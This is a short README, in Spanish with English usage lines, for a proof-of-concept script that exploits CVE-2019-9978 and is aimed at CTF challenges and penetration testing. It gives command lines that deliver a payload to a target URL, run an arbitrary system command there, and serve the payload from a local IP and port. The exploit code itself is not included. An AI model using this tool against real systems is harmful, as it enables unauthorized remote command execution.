
cve-2019-9978 PoC
Este es un script que permite explotar la vulnerabilidad CVE-2019-9978 de manera directa, pensado para su uso en desafíos Capture The Flag (CTF) o como prueba de concepto para pruebas de penetración.
pip install requests) ./cve-2019-9978.py -u http://target.com:9999 -c "your_system_command" -l your_ip:your_port
- `-u` or `--url`: Set the target URL to deliver the payload.
- `-c` or `--command`: Set the system command to run on the target system.
- `-l` or `--local`: Set the IP and port for the HTTP server (optional).
./cve-2019-9978.py -u http://target.com:9999 -c "id" -l 10.10.13.15:12345
Este código es únicamente para fines educativos y de prueba. El uso no autorizado en sistemas sin la debida autorización es ilegal y poco ético. Úsalo de manera responsable.